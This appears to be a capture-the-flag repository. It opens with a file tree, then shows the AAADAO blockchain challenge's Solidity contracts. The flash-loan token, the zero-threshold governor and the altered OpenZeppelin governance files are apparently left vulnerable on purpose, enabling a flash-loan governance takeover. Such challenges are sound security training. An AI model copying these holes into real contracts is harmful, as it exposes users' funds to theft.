├── .gitignore ├── README.md ├── blockchain ├── AAADAO │ ├── attachments │ │ ├── Deploy.sol │ │ ├── Gov.sol │ │ ├── Token.sol │ │ ├── access │ │ │ ├── AccessControl.sol │ │ │ ├── AccessControlCrossChain.sol │ │ │ ├── AccessControlEnumerable.sol │ │ │ ├── IAccessControl.sol │ │ │ ├── IAccessControlEnumerable.sol │ │ │ └── Ownable.sol │ │ ├── governance │ │ │ ├── Governor.sol │ │ │ ├── GovernorVotes.sol │ │ │ ├── IGovernor.sol │ │ │ ├── TimelockController.sol │ │ │ ├── compatibility │ │ │ │ ├── GovernorCompatibilityBravo.sol │ │ │ │ └── IGovernorCompatibilityBravo.sol │ │ │ ├── extensions │ │ │ │ ├── GovernorCountingSimple.sol │ │ │ │ ├── GovernorPreventLateQuorum.sol │ │ │ │ ├── GovernorProposalThreshold.sol │ │ │ │ ├── GovernorSettings.sol │ │ │ │ ├── GovernorTimelockCompound.sol │ │ │ │ ├── GovernorTimelockControl.sol │ │ │ │ ├── GovernorVotes.sol │ │ │ │ ├── GovernorVotesComp.sol │ │ │ │ ├── GovernorVotesQuorumFraction.sol │ │ │ │ └── IGovernorTimelock.sol │ │ │ └── utils │ │ │ │ ├── IVotes.sol │ │ │ │ └── Votes.sol │ │ ├── interfaces │ │ │ ├── IERC1155.sol │ │ │ ├── IERC1155MetadataURI.sol │ │ │ ├── IERC1155Receiver.sol │ │ │ ├── IERC1271.sol │ │ │ ├── IERC1363.sol │ │ │ ├── IERC1363Receiver.sol │ │ │ ├── IERC1363Spender.sol │ │ │ ├── IERC165.sol │ │ │ ├── IERC1820Implementer.sol │ │ │ ├── IERC1820Registry.sol │ │ │ ├── IERC20.sol │ │ │ ├── IERC20Metadata.sol │ │ │ ├── IERC2981.sol │ │ │ ├── IERC3156.sol │ │ │ ├── IERC3156FlashBorrower.sol │ │ │ ├── IERC3156FlashLender.sol │ │ │ ├── IERC721.sol │ │ │ ├── IERC721Enumerable.sol │ │ │ ├── IERC721Metadata.sol │ │ │ ├── IERC721Receiver.sol │ │ │ ├── IERC777.sol │ │ │ ├── IERC777Recipient.sol │ │ │ ├── IERC777Sender.sol │ │ │ ├── README.adoc │ │ │ ├── draft-IERC1822.sol │ │ │ └── draft-IERC2612.sol │ │ ├── token │ │ │ ├── ERC1155 │ │ │ │ ├── ERC1155.sol │ │ │ │ ├── IERC1155.sol │ │ │ │ ├── IERC1155Receiver.sol │ │ │ │ ├── README.adoc │ │ │ │ ├── extensions │ │ │ │ │ ├── ERC1155Burnable.sol │ │ │ │ │ ├── ERC1155Pausable.sol │ │ │ │ │ ├── ERC1155Supply.sol │ │ │ │ │ ├── ERC1155URIStorage.sol │ │ │ │ │ └── IERC1155MetadataURI.sol │ │ │ │ ├── presets │ │ │ │ │ ├── ERC1155PresetMinterPauser.sol │ │ │ │ │ └── README.md │ │ │ │ └── utils │ │ │ │ │ ├── ERC1155Holder.sol │ │ │ │ │ └── ERC1155Receiver.sol │ │ │ ├── ERC20 │ │ │ │ ├── ERC20.sol │ │ │ │ ├── IERC20.sol │ │ │ │ ├── README.adoc │ │ │ │ ├── extensions │ │ │ │ │ ├── ERC20Burnable.sol │ │ │ │ │ ├── ERC20Capped.sol │ │ │ │ │ ├── ERC20FlashMint.sol │ │ │ │ │ ├── ERC20Pausable.sol │ │ │ │ │ ├── ERC20Snapshot.sol │ │ │ │ │ ├── ERC20Votes.sol │ │ │ │ │ ├── ERC20VotesComp.sol │ │ │ │ │ ├── ERC20Wrapper.sol │ │ │ │ │ ├── IERC20Metadata.sol │ │ │ │ │ ├── draft-ERC20Permit.sol │ │ │ │ │ └── draft-IERC20Permit.sol │ │ │ │ ├── presets │ │ │ │ │ ├── ERC20PresetFixedSupply.sol │ │ │ │ │ ├── ERC20PresetMinterPauser.sol │ │ │ │ │ └── README.md │ │ │ │ └── utils │ │ │ │ │ ├── SafeERC20.sol │ │ │ │ │ └── TokenTimelock.sol │ │ │ ├── ERC721 │ │ │ │ ├── ERC721.sol │ │ │ │ ├── IERC721.sol │ │ │ │ ├── IERC721Receiver.sol │ │ │ │ ├── README.adoc │ │ │ │ ├── extensions │ │ │ │ │ ├── ERC721Burnable.sol │ │ │ │ │ ├── ERC721Enumerable.sol │ │ │ │ │ ├── ERC721Pausable.sol │ │ │ │ │ ├── ERC721Royalty.sol │ │ │ │ │ ├── ERC721URIStorage.sol │ │ │ │ │ ├── IERC721Enumerable.sol │ │ │ │ │ ├── IERC721Metadata.sol │ │ │ │ │ └── draft-ERC721Votes.sol │ │ │ │ ├── presets │ │ │ │ │ ├── ERC721PresetMinterPauserAutoId.sol │ │ │ │ │ └── README.md │ │ │ │ └── utils │ │ │ │ │ └── ERC721Holder.sol │ │ │ ├── ERC777 │ │ │ │ ├── ERC777.sol │ │ │ │ ├── IERC777.sol │ │ │ │ ├── IERC777Recipient.sol │ │ │ │ ├── IERC777Sender.sol │ │ │ │ ├── README.adoc │ │ │ │ └── presets │ │ │ │ │ └── ERC777PresetFixedSupply.sol │ │ │ └── common │ │ │ │ ├── ERC2981.sol │ │ │ │ └── README.adoc │ │ └── utils │ │ │ ├── Address.sol │ │ │ ├── Arrays.sol │ │ │ ├── Base64.sol │ │ │ ├── Checkpoints.sol │ │ │ ├── Context.sol │ │ │ ├── Counters.sol │ │ │ ├── Create2.sol │ │ │ ├── Multicall.sol │ │ │ ├── README.adoc │ │ │ ├── StorageSlot.sol │ │ │ ├── Strings.sol │ │ │ ├── Timers.sol │ │ │ ├── cryptography │ │ │ ├── ECDSA.sol │ │ │ ├── MerkleProof.sol │ │ │ ├── SignatureChecker.sol │ │ │ └── draft-EIP712.sol │ │ │ ├── escrow │ │ │ ├── ConditionalEscrow.sol │ │ │ ├── Escrow.sol │ │ │ └── RefundEscrow.sol │ │ │ ├── introspection │ │ │ ├── ERC165.sol │ │ │ ├── ERC165Checker.sol │ │ │ ├── ERC165Storage.sol │ │ │ ├── ERC1820Implementer.sol │ │ │ ├── IERC165.sol │ │ │ ├── IERC1820Implementer.sol │ │ │ └── IERC1820Registry.sol │ │ │ ├── math │ │ │ ├── Math.sol │ │ │ ├── SafeCast.sol │ │ │ ├── SafeMath.sol │ │ │ ├── SignedMath.sol │ │ │ └── SignedSafeMath.sol │ │ │ └── structs │ │ │ ├── BitMaps.sol │ │ │ ├── DoubleEndedQueue.sol │ │ │ ├── EnumerableMap.sol │ │ │ └── EnumerableSet.sol │ └── exploits │ │ └── PoC.sol ├── Weird_EVM │ ├── README.md │ ├── depoly │ │ ├── Dockerfile │ │ ├── LICENSE │ │ ├── README.md │ │ ├── config │ │ │ ├── genesis.json │ │ │ ├── keystore │ │ │ │ └── UTC--2022-06-21T09-05-49.757555100Z--639a0408b8f8997bb80af7ef373df92c851c7742 │ │ │ └── password.txt │ │ ├── docker-compose.yml │ │ ├── entrypoint.sh │ │ ├── eth-challenge-base │ │ │ ├── .dockerignore │ │ │ ├── .env │ │ │ ├── Dockerfile │ │ │ ├── LICENSE │ │ │ ├── Makefile │ │ │ ├── README.md │ │ │ ├── challenge.yml │ │ │ ├── contracts │ │ │ │ └── Game.json │ │ │ ├── develop.py │ │ │ ├── entrypoint.sh │ │ │ ├── eth_challenge_base │ │ │ │ ├── __init__.py │ │ │ │ ├── action.py │ │ │ │ ├── config.py │ │ │ │ └── utils │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── eth.py │ │ │ │ │ └── pow.py │ │ │ ├── requirements-dev.in │ │ │ ├── requirements-dev.txt │ │ │ ├── requirements.in │ │ │ ├── requirements.txt │ │ │ ├── run.py │ │ │ └── xinetd.sh │ │ ├── nginx.conf │ │ └── njs │ │ │ └── eth-jsonrpc-access.js │ ├── exploits │ │ ├── Game.sol │ │ ├── Solu.sol │ │ ├── bn256.sol │ │ ├── build │ │ │ ├── Game.abi │ │ │ ├── Game.bin │ │ │ ├── Solu.abi │ │ │ └── Solu.bin │ │ ├── ed25519.sol │ │ └── solution.py │ ├── hints │ │ ├── README.md │ │ ├── opcodeTableGotter.sh │ │ └── src.zip │ └── patches │ │ ├── 0001-Add-precompiled-and-marshal-opcodes.patch │ │ ├── Instruction.h │ │ └── opcode_dict.py └── bet2loss │ ├── attachments │ ├── Dockerfile │ ├── app.js │ ├── bin │ │ └── www │ ├── contracts │ │ └── BetToken.json │ ├── package-lock.json │ ├── package.json │ ├── public │ │ ├── index.html │ │ ├── javascripts │ │ │ └── index.js │ │ ├── public │ │ │ ├── mdl │ │ │ │ ├── icons.woff2 │ │ │ │ ├── material.indigo-blue.css │ │ │ │ ├── material.js │ │ │ │ └── note.txt │ │ │ ├── uiHelper.css │ │ │ └── uiHelper.js │ │ └── stylesheets │ │ │ └── style.css │ ├── routes │ │ ├── flag.js │ │ ├── index.js │ │ ├── log.js │ │ └── sync.js │ ├── start.sh │ └── views │ │ ├── error.jade │ │ ├── index.jade │ │ └── layout.jade │ └── exploits │ ├── README.md │ ├── solution1 │ ├── bet.sol │ ├── post.py │ └── solve.py │ └── solution2 │ ├── Attacker.cache.json │ ├── Attacker.sol │ ├── BetToken.cache.json │ ├── BetToken.sol │ ├── build │ ├── Attacker.abi │ ├── Attacker.bin │ ├── BetToken.abi │ ├── BetToken.bin │ ├── Callee.abi │ ├── Callee.bin │ ├── Context.abi │ ├── Context.bin │ ├── HasState.abi │ ├── HasState.bin │ ├── Ownable.abi │ └── Ownable.bin │ └── solution.py ├── crypto ├── CryptoNote │ ├── README.md │ ├── attachments │ │ ├── crypto_note.tar.gz │ │ ├── hint1.tar.gz │ │ └── hint2.py │ ├── deploy │ │ ├── Dockerfile │ │ └── src │ │ │ ├── blockchain_service.py │ │ │ ├── deploy.sh │ │ │ ├── ring_signature.py │ │ │ ├── run_instance.sh │ │ │ ├── run_socat.sh │ │ │ └── secret.py │ ├── exploits │ │ ├── blockchain_service.py │ │ ├── bob_public_key_restore.py │ │ ├── carol_public_key_restore.py │ │ ├── range_proof_from_carol.json │ │ ├── ring_signature.py │ │ ├── secret.py │ │ ├── signed_message_from_bob.json │ │ ├── signed_message_verifier.py │ │ ├── solution.py │ │ ├── writeup_en.md │ │ └── writeup_zh.md │ ├── src │ │ ├── Dockerfile │ │ ├── blockchain_service.py │ │ ├── bob_public_key_restore.py │ │ ├── bob_signed_generate.py │ │ ├── build_attachment.sh │ │ ├── calc_bn_curve.py │ │ ├── calc_edo_curve.sage │ │ ├── carol_public_key_restore.py │ │ ├── carol_range_proof_generate.py │ │ ├── copy_deploy.sh │ │ ├── copy_solution.sh │ │ ├── deploy.sh │ │ ├── range_proof_from_carol.json │ │ ├── range_proof_verifier.py │ │ ├── ring_signature.py │ │ ├── run_instance.sh │ │ ├── run_socat.sh │ │ ├── secret.py │ │ ├── secret_demo.py │ │ ├── signed_message_from_bob.json │ │ ├── signed_message_verifier.py │ │ ├── solution.py │ │ ├── solution_fake.py │ │ └── solution_poc.py │ ├── writeup_en.md │ └── writeup_zh.md ├── RSA_Leak │ ├── attachments │ │ └── task.py │ └── writeup_en.md ├── casino │ └── attachments │ │ ├── Dockerfile │ │ ├── backend.py │ │ ├── casino.py │ │ ├── main.py │ │ ├── players.py │ │ ├── secret.py │ │ ├── service.conf │ │ └── wrapper ├── impossibleRSA │ └── attachments │ │ ├── flag │ │ ├── public.pem │ │ └── server.py ├── retros │ ├── attachments │ │ └── retros │ └── writeup_en.md └── secure_connection │ ├── attachments │ ├── client.py │ ├── core.py │ └── master.txt │ └── exploits │ ├── client.py │ ├── core.py │ ├── packet.txt │ ├── server.py │ └── solver.py ├── logo.png ├── misc ├── Broken_QRCode │ ├── README.md │ ├── generate.py │ ├── origin.png │ ├── qrcodes │ │ ├── 0.jpg │ │ ├── 1.jpg │ │ ├── 10.jpg │ │ ├── 11.jpg │ │ ├── 2.jpg │ │ ├── 3.jpg │ │ ├── 4.jpg │ │ ├── 5.jpg │ │ ├── 6.jpg │ │ ├── 7.jpg │ │ ├── 8.jpg │ │ └── 9.jpg │ ├── solver.py │ └── 题目.png ├── FFSK │ ├── FFSK_WriteUp.md │ ├── attachments │ │ └── modem.wav │ └── exploits │ │ ├── decode.py │ │ ├── gen.py │ │ └── goertzel.py ├── Man_in_Middle │ ├── attachments │ │ ├── AP.py │ │ ├── Client.py │ │ └── util.py │ └── exploits │ │ ├── AP.py │ │ ├── Client.py │ │ ├── exp.py │ │ ├── key.py │ │ ├── secret.txt │ │ ├── solve.py │ │ └── util.py ├── Signin │ ├── attachments │ │ └── flag │ └── exploits │ │ ├── compress.py │ │ └── decompress.py ├── Weird_rev │ └── attachment.tar.gz ├── safer-telegram-bot │ ├── Safer-telegram-bot-{1,2} write up en-US.md │ └── safer-telegram-bot-{1,2} write up.md └── 탕쿠쿠의유혹 │ ├── attachments │ └── 6cv_large.zip │ └── wp │ ├── broken.webp │ ├── diff.jpg │ ├── ori_twi.jpg │ └── writeup.md ├── pwn ├── 2048 │ └── attachments │ │ ├── 2048 │ │ ├── ld-2.31.so │ │ └── libc-2.31.so ├── EasyVM │ ├── attachments │ │ ├── AppJailLauncher.exe │ │ ├── EasyVM.exe │ │ ├── dlls │ │ │ ├── KernelBase.dll │ │ │ ├── kernel32.dll │ │ │ ├── ntdll.dll │ │ │ ├── ucrtbase.dll │ │ │ └── vcruntime140.dll │ │ └── start.ps1 │ └── exploits │ │ ├── EasyVM.c │ │ └── pwn_easyvm.py ├── kkk │ ├── attachments │ │ ├── bzImage │ │ ├── rootfs.img │ │ └── start.sh │ └── exploits │ │ ├── exploit.py │ │ ├── kkk.c │ │ ├── libcrc.so │ │ └── parser.c ├── master_of_dns │ ├── attachments │ │ ├── README.md │ │ ├── dns │ │ ├── dns.conf │ │ └── start.sh │ └── exploits │ │ ├── exp.py │ │ ├── poc.py │ │ └── writeup.md ├── mykvm │ ├── attachments │ │ ├── Dockerfile │ │ ├── bin │ │ │ └── mykvm │ │ ├── ctf.xinetd │ │ └── start.sh │ └── exploits │ │ ├── exp.asm │ │ ├── exp.bin │ │ ├── exp.py │ │ └── readme.txt └── treepwn │ ├── attachments │ ├── ld-2.27.so │ ├── libc-2.27.so │ └── treepwn │ └── exploits │ ├── exploit_remote.py │ └── treepwn.c ├── reverse ├── FunTiger │ └── attachments │ │ └── funTiger ├── Inflated │ └── attachments │ │ └── inflated ├── Nagi_Knows │ ├── attachments │ │ └── nagi.hpp │ └── exploits │ │ ├── nagi.hpp │ │ ├── original.hpp │ │ └── solve.cpp ├── dropper │ ├── attachments │ │ └── dropper.exe │ └── exploits │ │ ├── writeup_cn.md │ │ └── writeup_en.md └── kcov │ └── attachments │ ├── bzImage │ ├── launch.sh │ └── rootfs.cpio.gz └── web ├── ToLeSion ├── attachments │ ├── docker-compose.yml │ └── src │ │ ├── app.py │ │ ├── dockerfile │ │ ├── flag │ │ ├── readflag │ │ ├── requirements.txt │ │ └── start.sh └── exploits │ ├── FTPServer.py │ └── exp.py ├── beWhatYouWannaBe ├── attachments │ ├── docker-compose.yml │ ├── mongodb │ │ ├── Dockerfile │ │ └── start.sh │ └── src │ │ ├── Dockerfile │ │ └── app │ │ ├── admin.js │ │ ├── app.js │ │ ├── config.js │ │ ├── package.json │ │ └── views │ │ ├── home.ejs │ │ ├── login.ejs │ │ └── register.ejs └── exploits │ └── exploit.html ├── gogogo ├── attachments │ ├── docker-compose.yml │ └── src │ │ ├── Dockerfile │ │ ├── flag │ │ └── hello └── exploits │ ├── exp.py │ ├── hack.c │ └── hack.so ├── myclient ├── attachments │ ├── check_health.sh │ ├── docker-compose.yml │ └── src │ │ ├── Dockerfile │ │ ├── files │ │ ├── index.php │ │ ├── my.cnf │ │ ├── readflag.c │ │ └── start.sh │ │ └── flag └── exploits │ ├── exp.py │ └── hack.so └── poorui ├── attachments ├── docker-compose.yml └── src │ ├── Dockerfile │ └── source │ ├── adminbot.js │ ├── config.js │ ├── flagbot.js │ ├── package.json │ ├── public │ ├── asset-manifest.json │ ├── favicon.ico │ ├── index.html │ ├── logo192.png │ ├── logo512.png │ ├── manifest.json │ ├── robots.txt │ ├── static │ │ ├── css │ │ │ ├── main.66b2f292.css │ │ │ ├── main.c7f24255.css │ │ │ └── main.c7f24255.css.map │ │ └── js │ │ │ ├── main.001408dd.js │ │ │ ├── main.001408dd.js.LICENSE.txt │ │ │ ├── main.001408dd.js.map │ │ │ ├── main.11c0ee5f.js │ │ │ ├── main.11c0ee5f.js.LICENSE.txt │ │ │ ├── main.11c0ee5f.js.map │ │ │ ├── main.279bff5f.js │ │ │ ├── main.279bff5f.js.LICENSE.txt │ │ │ ├── main.279bff5f.js.map │ │ │ ├── main.2caa5c0e.js │ │ │ ├── main.2caa5c0e.js.LICENSE.txt │ │ │ ├── main.2caa5c0e.js.map │ │ │ ├── main.3ade83e5.js │ │ │ ├── main.3ade83e5.js.LICENSE.txt │ │ │ ├── main.495230db.js │ │ │ ├── main.495230db.js.LICENSE.txt │ │ │ ├── main.495230db.js.map │ │ │ ├── main.63b8003b.js │ │ │ ├── main.63b8003b.js.LICENSE.txt │ │ │ ├── main.63b8003b.js.map │ │ │ ├── main.646b89c1.js │ │ │ ├── main.646b89c1.js.LICENSE.txt │ │ │ ├── main.646b89c1.js.map │ │ │ ├── main.6e3bc586.js │ │ │ ├── main.6e3bc586.js.LICENSE.txt │ │ │ ├── main.6e3bc586.js.map │ │ │ ├── main.8724f30b.js │ │ │ ├── main.8724f30b.js.LICENSE.txt │ │ │ ├── main.8724f30b.js.map │ │ │ ├── main.96645d85.js │ │ │ ├── main.96645d85.js.LICENSE.txt │ │ │ ├── main.96645d85.js.map │ │ │ ├── main.a9ab67d1.js │ │ │ ├── main.a9ab67d1.js.LICENSE.txt │ │ │ ├── main.a9ab67d1.js.map │ │ │ ├── main.b938e663.js │ │ │ ├── main.b938e663.js.LICENSE.txt │ │ │ ├── main.b938e663.js.map │ │ │ ├── main.bdf21328.js │ │ │ ├── main.bdf21328.js.LICENSE.txt │ │ │ ├── main.bdf21328.js.map │ │ │ ├── main.c7272f4d.js │ │ │ ├── main.c7272f4d.js.LICENSE.txt │ │ │ ├── main.c7272f4d.js.map │ │ │ ├── main.cd218967.js │ │ │ ├── main.cd218967.js.LICENSE.txt │ │ │ ├── main.cd218967.js.map │ │ │ ├── main.d021eda1.js │ │ │ ├── main.d021eda1.js.LICENSE.txt │ │ │ ├── main.f01d71b1.js │ │ │ ├── main.f01d71b1.js.LICENSE.txt │ │ │ ├── main.f01d71b1.js.map │ │ │ ├── main.fcca55c7.js │ │ │ ├── main.fcca55c7.js.LICENSE.txt │ │ │ └── main.fcca55c7.js.map │ └── test.html │ ├── server.js │ ├── start.sh │ ├── tpls │ └── test.tpl │ └── util.js └── exploits └── readme.md /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/Deploy.sol: -------------------------------------------------------------------------------- 1 | import "./Gov.sol"; 2 | import "./Token.sol"; 3 | 4 | contract Deployer{ 5 | 6 | event Deploy(address token, address gov); 7 | 8 | function init() external returns(address,address) { 9 | AAA token=new AAA(); 10 | Gov gov=new Gov(IVotes(token)); 11 | token.transfer(address(gov),token.balanceOf(address(this))); 12 | 13 | emit Deploy(address(token), address(gov)); 14 | 15 | return (address(token),address(gov)); 16 | } 17 | } 18 | 19 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/Gov.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity ^0.8.2; 3 | 4 | import "./interfaces/IERC20.sol"; 5 | import "./governance/Governor.sol"; 6 | import "./governance/extensions/GovernorVotes.sol"; 7 | import "./governance/extensions/GovernorCountingSimple.sol"; 8 | import "./governance/extensions/GovernorVotesQuorumFraction.sol"; 9 | 10 | contract Gov is Governor, GovernorVotes,GovernorCountingSimple,GovernorVotesQuorumFraction{ 11 | address mytoken; 12 | constructor(IVotes _token) 13 | Governor("AAAGov") 14 | GovernorVotes(_token) 15 | GovernorVotesQuorumFraction(4) 16 | { 17 | _token.delegate(address(this)); 18 | mytoken=address(_token); 19 | } 20 | 21 | function votingDelay() public pure override returns (uint256) { 22 | return 10; // 1 day 23 | } 24 | 25 | function votingPeriod() public pure override returns (uint256) { 26 | return 46027; // 1 week 27 | } 28 | 29 | function proposalThreshold() public pure override returns (uint256) { 30 | return 0; 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/Token.sol: -------------------------------------------------------------------------------- 1 | pragma solidity ^0.8.0; 2 | 3 | import "./token/ERC20/extensions/ERC20Votes.sol"; 4 | import "./interfaces/IERC3156FlashBorrower.sol"; 5 | import "./interfaces/IERC3156FlashLender.sol"; 6 | 7 | bytes32 constant _RETURN_VALUE = keccak256("ERC3156FlashBorrower.onFlashLoan"); 8 | 9 | contract AAA is ERC20Votes{ 10 | constructor() ERC20("AToken", "AAA") ERC20Permit("AToken") { 11 | _mint(msg.sender, 100000000 * 10 ** decimals()); 12 | } 13 | 14 | function maxFlashLoan(address token) public view returns (uint256) { 15 | return token == address(this) ? type(uint256).max - ERC20.totalSupply() : 0; 16 | } 17 | 18 | function flashFee(address token, uint256 amount) public view returns (uint256) { 19 | require(token == address(this)); 20 | uint fee=amount/100; 21 | 22 | if(fee<10){ 23 | return 10; 24 | } 25 | return fee; 26 | } 27 | 28 | function flashLoan( 29 | IERC3156FlashBorrower receiver, 30 | address token, 31 | uint256 amount, 32 | bytes calldata data 33 | ) public returns (bool) { 34 | require(amount <= maxFlashLoan(token)); 35 | uint256 fee = flashFee(token, amount); 36 | _mint(address(receiver), amount); 37 | require( 38 | receiver.onFlashLoan(msg.sender, token, amount, fee, data) == _RETURN_VALUE 39 | ); 40 | _spendAllowance(address(receiver), address(this), amount + fee); 41 | _burn(address(receiver), amount + fee); 42 | return true; 43 | } 44 | } 45 | 46 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/access/IAccessControlEnumerable.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (access/IAccessControlEnumerable.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "./IAccessControl.sol"; 7 | 8 | /** 9 | * @dev External interface of AccessControlEnumerable declared to support ERC165 detection. 10 | */ 11 | interface IAccessControlEnumerable is IAccessControl { 12 | /** 13 | * @dev Returns one of the accounts that have `role`. `index` must be a 14 | * value between 0 and {getRoleMemberCount}, non-inclusive. 15 | * 16 | * Role bearers are not sorted in any particular way, and their ordering may 17 | * change at any point. 18 | * 19 | * WARNING: When using {getRoleMember} and {getRoleMemberCount}, make sure 20 | * you perform all queries on the same block. See the following 21 | * https://forum.openzeppelin.com/t/iterating-over-elements-on-enumerableset-in-openzeppelin-contracts/2296[forum post] 22 | * for more information. 23 | */ 24 | function getRoleMember(bytes32 role, uint256 index) external view returns (address); 25 | 26 | /** 27 | * @dev Returns the number of accounts that have `role`. Can be used 28 | * together with {getRoleMember} to enumerate all bearers of a role. 29 | */ 30 | function getRoleMemberCount(bytes32 role) external view returns (uint256); 31 | } 32 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/governance/GovernorVotes.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts (last updated v4.6.0) (governance/extensions/GovernorVotes.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "./Governor.sol"; 7 | import "./utils/IVotes.sol"; 8 | 9 | /** 10 | * @dev Extension of {Governor} for voting weight extraction from an {ERC20Votes} token, or since v4.5 an {ERC721Votes} token. 11 | * 12 | * _Available since v4.3._ 13 | */ 14 | abstract contract GovernorVotes is Governor { 15 | IVotes public immutable token; 16 | 17 | constructor(IVotes tokenAddress) { 18 | token = tokenAddress; 19 | } 20 | 21 | /** 22 | * Read the voting weight from the token's built in snapshot mechanism (see {Governor-_getVotes}). 23 | */ 24 | function _getVotes( 25 | address account, 26 | uint256 blockNumber, 27 | bytes memory /*params*/ 28 | ) internal view virtual override returns (uint256) { 29 | require(token.getVotes(account)>0,"fuck you"); 30 | return token.getVotes(account); 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/governance/extensions/GovernorProposalThreshold.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (governance/extensions/GovernorProposalThreshold.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../Governor.sol"; 7 | 8 | /** 9 | * @dev Extension of {Governor} for proposal restriction to token holders with a minimum balance. 10 | * 11 | * _Available since v4.3._ 12 | * _Deprecated since v4.4._ 13 | */ 14 | abstract contract GovernorProposalThreshold is Governor { 15 | function propose( 16 | address[] memory targets, 17 | uint256[] memory values, 18 | bytes[] memory calldatas, 19 | string memory description 20 | ) public virtual override returns (uint256) { 21 | return super.propose(targets, values, calldatas, description); 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/governance/extensions/GovernorVotes.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts (last updated v4.6.0) (governance/extensions/GovernorVotes.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../Governor.sol"; 7 | import "../utils/IVotes.sol"; 8 | 9 | /** 10 | * @dev Extension of {Governor} for voting weight extraction from an {ERC20Votes} token, or since v4.5 an {ERC721Votes} token. 11 | * 12 | * _Available since v4.3._ 13 | */ 14 | abstract contract GovernorVotes is Governor { 15 | IVotes public immutable token; 16 | 17 | constructor(IVotes tokenAddress) { 18 | token = tokenAddress; 19 | } 20 | 21 | /** 22 | * Read the voting weight from the token's built in snapshot mechanism (see {Governor-_getVotes}). 23 | */ 24 | function _getVotes( 25 | address account, 26 | uint256 blockNumber, 27 | bytes memory /*params*/ 28 | ) internal view virtual override returns (uint256) { 29 | return token.getVotes(account); 30 | } 31 | } 32 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/governance/extensions/GovernorVotesComp.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts (last updated v4.6.0) (governance/extensions/GovernorVotesComp.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../Governor.sol"; 7 | import "../../token/ERC20/extensions/ERC20VotesComp.sol"; 8 | 9 | /** 10 | * @dev Extension of {Governor} for voting weight extraction from a Comp token. 11 | * 12 | * _Available since v4.3._ 13 | */ 14 | abstract contract GovernorVotesComp is Governor { 15 | ERC20VotesComp public immutable token; 16 | 17 | constructor(ERC20VotesComp token_) { 18 | token = token_; 19 | } 20 | 21 | /** 22 | * Read the voting weight from the token's built in snapshot mechanism (see {Governor-_getVotes}). 23 | */ 24 | function _getVotes( 25 | address account, 26 | uint256 blockNumber, 27 | bytes memory /*params*/ 28 | ) internal view virtual override returns (uint256) { 29 | return token.getPriorVotes(account, blockNumber); 30 | } 31 | } 32 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/governance/extensions/IGovernorTimelock.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (governance/extensions/IGovernorTimelock.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../IGovernor.sol"; 7 | 8 | /** 9 | * @dev Extension of the {IGovernor} for timelock supporting modules. 10 | * 11 | * _Available since v4.3._ 12 | */ 13 | abstract contract IGovernorTimelock is IGovernor { 14 | event ProposalQueued(uint256 proposalId, uint256 eta); 15 | 16 | function timelock() public view virtual returns (address); 17 | 18 | function proposalEta(uint256 proposalId) public view virtual returns (uint256); 19 | 20 | function queue( 21 | address[] memory targets, 22 | uint256[] memory values, 23 | bytes[] memory calldatas, 24 | bytes32 descriptionHash 25 | ) public virtual returns (uint256 proposalId); 26 | } 27 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC1155.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC1155.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../token/ERC1155/IERC1155.sol"; 7 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC1155MetadataURI.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC1155MetadataURI.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../token/ERC1155/extensions/IERC1155MetadataURI.sol"; 7 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC1155Receiver.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC1155Receiver.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../token/ERC1155/IERC1155Receiver.sol"; 7 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC1271.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC1271.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | /** 7 | * @dev Interface of the ERC1271 standard signature validation method for 8 | * contracts as defined in https://eips.ethereum.org/EIPS/eip-1271[ERC-1271]. 9 | * 10 | * _Available since v4.1._ 11 | */ 12 | interface IERC1271 { 13 | /** 14 | * @dev Should return whether the signature provided is valid for the provided data 15 | * @param hash Hash of the data to be signed 16 | * @param signature Signature byte array associated with _data 17 | */ 18 | function isValidSignature(bytes32 hash, bytes memory signature) external view returns (bytes4 magicValue); 19 | } 